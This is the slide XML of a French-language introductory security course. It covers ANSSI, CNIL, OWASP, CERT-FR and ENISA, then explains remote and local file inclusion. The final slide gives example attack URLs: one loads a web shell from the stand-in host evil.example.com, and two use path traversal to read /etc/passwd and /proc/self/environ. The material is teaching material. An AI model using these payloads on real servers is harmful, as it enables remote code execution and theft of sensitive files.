            <a:endParaRPr sz="3478"/>
          </a:p>
          <a:p>
            <a:pPr indent="-449506" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3479"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3478"/>
              <a:t>…</a:t>
            </a:r>
            <a:endParaRPr sz="3478"/>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ANSSI</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en" sz="2920"/>
              <a:t>Agence nationale de la sécurité des systèmes d'information</a:t>
            </a:r>
            <a:endParaRPr sz="2920"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2920" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://cyber.gouv.fr/</a:t>
            </a:r>
            <a:endParaRPr sz="2920"/>
          </a:p>
          <a:p>
            <a:pPr indent="-366666" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3478"/>
              <a:t>autorité nationale en matière de sécurité et de défense des systèmes d’information en France</a:t>
            </a:r>
            <a:endParaRPr sz="3478"/>
          </a:p>
          <a:p>
            <a:pPr indent="-366666" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3478"/>
              <a:t>protection des infrastructures critiques </a:t>
            </a:r>
            <a:endParaRPr sz="3478"/>
          </a:p>
          <a:p>
            <a:pPr indent="-366666" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3478"/>
              <a:t>sensibilisation à la cybersécurité</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="2578"/>
            </a:br>
            <a:endParaRPr sz="2578"/>
          </a:p>
          <a:p>
            <a:pPr indent="-366666" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:br>
              <a:rPr lang="en" sz="3478"/>
            </a:br>
            <a:endParaRPr sz="3478"/>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CNIL</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en" sz="2920"/>
              <a:t>Commission nationale de l'informatique et des libertés</a:t>
            </a:r>
            <a:endParaRPr sz="2920"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2920" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://www.cnil.fr/</a:t>
            </a:r>
            <a:endParaRPr sz="2920"/>
          </a:p>
          <a:p>
            <a:pPr indent="-366666" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3478"/>
              <a:t>autorité française chargée de veiller à la protection des données personnelles</a:t>
            </a:r>
            <a:endParaRPr sz="3478"/>
          </a:p>
          <a:p>
            <a:pPr indent="-366666" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3478"/>
              <a:t>émet des recommandations et des directives pour garantir la confidentialité et la sécurité des informations des utilisateurs</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="3478"/>
            </a:br>
            <a:br>
              <a:rPr lang="en" sz="2578"/>
            </a:br>
            <a:endParaRPr sz="2578"/>
          </a:p>
          <a:p>
            <a:pPr indent="-366666" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="3478"/>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OWASP</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n" sz="2920"/>
              <a:t>Open Web Application Security Project</a:t>
            </a:r>
            <a:endParaRPr sz="2920"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2920" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://owasp.org/</a:t>
            </a:r>
            <a:endParaRPr sz="2920"/>
          </a:p>
          <a:p>
            <a:pPr indent="-333530" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3478"/>
              <a:t>communauté mondiale sur la sécurité des applications Web </a:t>
            </a:r>
            <a:endParaRPr sz="3478"/>
          </a:p>
          <a:p>
            <a:pPr indent="-333530" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3478"/>
              <a:t>fournit :</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="3478"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="3478"/>
              <a:t>→ ressources</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="3478"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="3478"/>
              <a:t>→ outils</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="3478"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="3478"/>
              <a:t>→ bonnes pratiques</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1728"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1728"/>
            </a:br>
            <a:br>
              <a:rPr lang="en" sz="1728"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="3478"/>
              <a:t>pour prévenir des vulnérabilités :</a:t>
            </a:r>
            <a:endParaRPr sz="3478"/>
          </a:p>
          <a:p>
            <a:pPr indent="-333530" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3478"/>
              <a:t>injections SQL</a:t>
            </a:r>
            <a:endParaRPr sz="3478"/>
          </a:p>
          <a:p>
            <a:pPr indent="-333530" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3478"/>
              <a:t>les failles XSS</a:t>
            </a:r>
            <a:endParaRPr sz="3478"/>
          </a:p>
          <a:p>
            <a:pPr indent="-333530" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3478"/>
              <a:t>problèmes d’authentification</a:t>
            </a:r>
            <a:endParaRPr sz="3478"/>
          </a:p>
          <a:p>
            <a:pPr indent="-333530" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3478"/>
              <a:t>…</a:t>
            </a:r>
            <a:endParaRPr sz="3478"/>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Autres organismes de sécurité</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20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-366666" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3478"/>
              <a:t>CERT</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="3478"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="3478"/>
              <a:t>Computer emergency response team</a:t>
            </a:r>
            <a:endParaRPr sz="3478"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2100" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://www.cert.ssi.gouv.fr/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2100"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1949"/>
              <a:t>CERT-FR</a:t>
            </a:r>
            <a:endParaRPr sz="570"/>
          </a:p>
          <a:p>
            <a:pPr indent="-366666" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3478"/>
              <a:t>ENISA</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="3478"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="3478"/>
              <a:t>European Union Agency for Cybersecurity</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="2609"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="2158" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://www.enisa.europa.eu/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3478"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="3478"/>
            </a:br>
            <a:endParaRPr sz="3478"/>
          </a:p>
          <a:p>
            <a:pPr indent="-366666" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3478"/>
              <a:t>…</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="3478"/>
            </a:br>
            <a:endParaRPr sz="3478"/>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 cas d’attaque d’application Web : le RFI</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Clr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="40692"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2703"/>
              <a:t>RFI : Remote File Inclusion</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2703"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="61111"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Cible un site Web en faisant inclure un fichier distant</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>en exécutant un script sur le serveur Web.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="61111"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>La vulnérabilité est due à l'utilisation de données fournies par l'utilisateur sans validation. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="61111"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Ça peut permettre d'exécuter du code ne faisant pas partie de l'application.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Ce code peut être exécuté sur le serveur ou sur le client.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="61111"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Voir aussi :</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="61111"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>LFI : Local File Inclusion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Une attaque où le serveur inclut l'un de ses propres fichiers.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>C'est similaire au RFI et permet de récupérer des informations censées être confidentielles.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Si l’application ne filtre pas les chemins de fichiers, l’attaquant peut accéder à des fichiers sensibles sur le serveur.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Exemples d'attaque RFI</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a:t>Comment faire exécuter du code sur un serveur PHP mal sécurisé ?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Si le code de l'application Web utilise les variables PHP “superglobales” comme </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>$_GET</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> et </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>$_POST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> sans les valider...</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="139700" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="139700" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>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1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1050">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F8F9FA"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>/vulnerable.php?language=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1050" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://evil.example.com/webshell.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1050">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="1050">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1050">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F8F9FA"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>/vulnerable.php?language=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1050">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>C:\\ftp\\upload\\exploit</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="1050">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1050">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F8F9FA"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>/vulnerable.php?language=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1050">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>../../../../../etc/passwd%00</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="1050">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1050">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F8F9FA"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>/vulnerable.php?language=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1050">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>../../../../../proc/self/environ%00</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1050">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="105" name="Google Shape;105;p21"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="538448" y="2571750"/>
            <a:ext cx="3653075" cy="1118125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="106" name="Google Shape;106;p21"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4759875" y="2446987"/>
            <a:ext cx="3545975" cy="1367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